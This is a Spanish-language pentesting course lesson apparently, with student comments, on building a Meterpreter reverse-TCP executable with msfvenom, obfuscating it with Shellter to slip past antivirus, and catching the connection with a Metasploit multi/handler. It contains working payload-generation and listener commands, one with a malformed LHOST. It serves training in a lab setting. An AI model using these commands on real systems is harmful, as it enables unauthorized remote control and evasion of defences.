Creación de Malware y Estrategias de Ingeniería Social
Resumen
¿Cómo combinar estrategias de pentesting?
Pentesting, o pruebas de penetración, es un enfoque riguroso para evaluar la seguridad de un sistema. La clave del éxito como pentester es la capacidad de combinar diferentes estrategias y enfoques desde distintos ángulos. La adaptabilidad es crucial; es fundamental conocer múltiples herramientas y cómo usarlas en diversos escenarios. Así logramos sobrepasar obstáculos o problemas inesperados que surjan en el camino. Aquí exploraremos cómo aplicar estas estrategias combinando diversas tecnologías y técnicas.
¿Qué es el comando MSFvenom y cómo se utiliza?
MSFvenom es una herramienta poderosa dentro de la suite Metasploit que permite generar payloads o cargas útiles en múltiples formatos. Un payload es un fragmento de código diseñado para ejecutarse con un propósito específico, generalmente para obtener acceso remoto a una máquina.
Aquí se crea un archivo ejecutable (en formato .exe) que contiene un payload meterpreter usando el protocolo TCP inverso. Mediante LHOST y LPORT, se especifican la dirección IP y el puerto al cual se conectará la máquina objetivo una vez comprometida.
¿Para qué se usa la herramienta Shelter?
Shelter es una herramienta utilizada para ofuscar código. La ofuscación se utiliza para proteger el código haciendo difícil su análisis o detección por antivirus. Así, el código malicioso pasa inadvertido y no es bloqueado.
Para empezar, utilizamos el modo automático:
shelter.exe -f archivo.exe
Esta herramienta procesa el archivo para ocultar su propósito original, transformándolo en un archivo menos evidente para los sistemas de defensa, sin modificar su funcionalidad maliciosa.
¿Cómo montar el entorno con Metasploit?
Metasploit es una suite esencial para pruebas de seguridad, ampliamente usada para desarrollar y ejecutar exploits contra un sistema remoto. Para preparar el entorno en Metasploit, primero se inicia el servicio de su base de datos:
service postgresql start
msfconsole
Una vez en la consola de Metasploit, se selecciona el módulo correspondiente y se configuran los parámetros:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.103
set LPORT 4444
Finalmente, el exploit se ejecuta con el comando:
exploit
Esta configuración permite que el sistema esté preparado para escuchar conexiones, listo para recibir intentos de acceso a través del payload previamente configurado.
¿Cuál es la importancia de combinar herramientas y metodologías?
La combinación de herramientas y metodologías no solo mejora la efectividad del pentesting, sino que también aumenta las probabilidades de éxito en diversas situaciones. Trabajar con diferentes herramientas y aproximaciones permite una flexibilidad crucial para sortear desafíos singulares que podrían surgir durante las pruebas. Además:
Diversidad de herramientas significa múltiples soluciones para problemas similares.
Al estar bien preparado, es posible actuar ante situaciones inesperadas.
La familiaridad con diversas herramientas proporciona un enfoque integral en las pruebas de seguridad, ampliando el espectro de análisis y posibles resultados.
Con estas estrategias, se puede avanzar más eficientemente en la tarea de evaluar y reforzar la seguridad de un sistema. Con perseverancia y práctica diligente, cada paso en el aprendizaje del pentesting refuerza no solo la habilidad técnica, sino también la capacidad de anticipar posibles fallas de seguridad. ¡Continúa adelante en tu camino de aprendizaje!
En caso no hayan pasado antes por el curso de fundamentos, les hago saber que SHELLTER no viene preinstalada en las ultimas versiones de Kali, por ello deberán instalarlo. Shellter funciona en arquitecturas de 32 bits, por ello, en caso usen una de 64 bit, deberán agregar esa arquitectura con el siguiente comando
dpkg --add-architecture i386 && apt update && apt -y install wine32
Voy a dar un consejo, quizás muchos llegan a este punto sin practicar, porque se les perdió la conexión entre maquinas y no sabían como restablecerlas luego de usar determinadas herramientas, o cambiar las configuraciones, la verdad es que quizás con justa razón, Juan Pablo asume que podrán corregir esos problemas y el siguiente video lo empieza habiendo cambiado la configuración hecha en el anterior. Bueno, sin mas embrollo, si eso les pasa y por ello están pensando en abandonar, solo vuelvan hacer la configuración de RIP en el router uno y luego reinicien los servicios en router 2 y seguidamente router 1, y se les restablecerá la conexión, ah claro, deben también editar los archivos de /etc/network/inetrfaces de la maquina Kali que hayan cambiado o en todo caso apáguenla y vuelvan a prenderla, dado que las configuraciones son temporales
Saludos
gracias sobretodo poner otra vez el ip desde dinamico a ponerlo otra vez statico en /etc/network/inetrfaces y poner le red internal-10 otra vez , o sea como estaba antes y reiniciar todo!
No me suelen gustar las versiones boot porque generan muchos problemas de compatibilidad con los paquetes cuando se hacen actualizaciones o se descargan herramientas nuevas. Tuve que descargar e instalar de nuevo una versión installer de Kali, porque la live no me permitió descargar shellter por falta de espacio y por incompatibilidades con el manejador de paquetes.
hoy a dia, estan a unos pocos dias de salir un nuevocurso de metasploit
Hace unos meses intenté usar Shellter con un "explorer.exe" que saqué de Windows 11. El problema es que fue ahi cuando me di cuenta que Shellter solo funciona con ejecutables de 32 bits.
Existe algún equivalente a Shellter que me permita trabajar con ejecutables de 64 bits? O que tema debería aprender para hacer manualmente ese tipo de cosas?
No sé si a ustedes les pasa que al crear el meterpreter:
Aprece que si fue creado, pero no aparece el exe al ejecutar ls -la
ayuda con esto, por favor
no marco algun error durante la ejecucion del comando?
aqui hay un typo: LHOST = 10.0.15
Sí no les aparece el archivo.exe auqnue les diga que ya lo creo, intenten así:
msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST:10.0.15 LPORT=444 -o archivo.exe
no se a que curso de pentesting hace referencia el docente, segun estoy haciendo todos los cursos de especialista de ciberseguridad
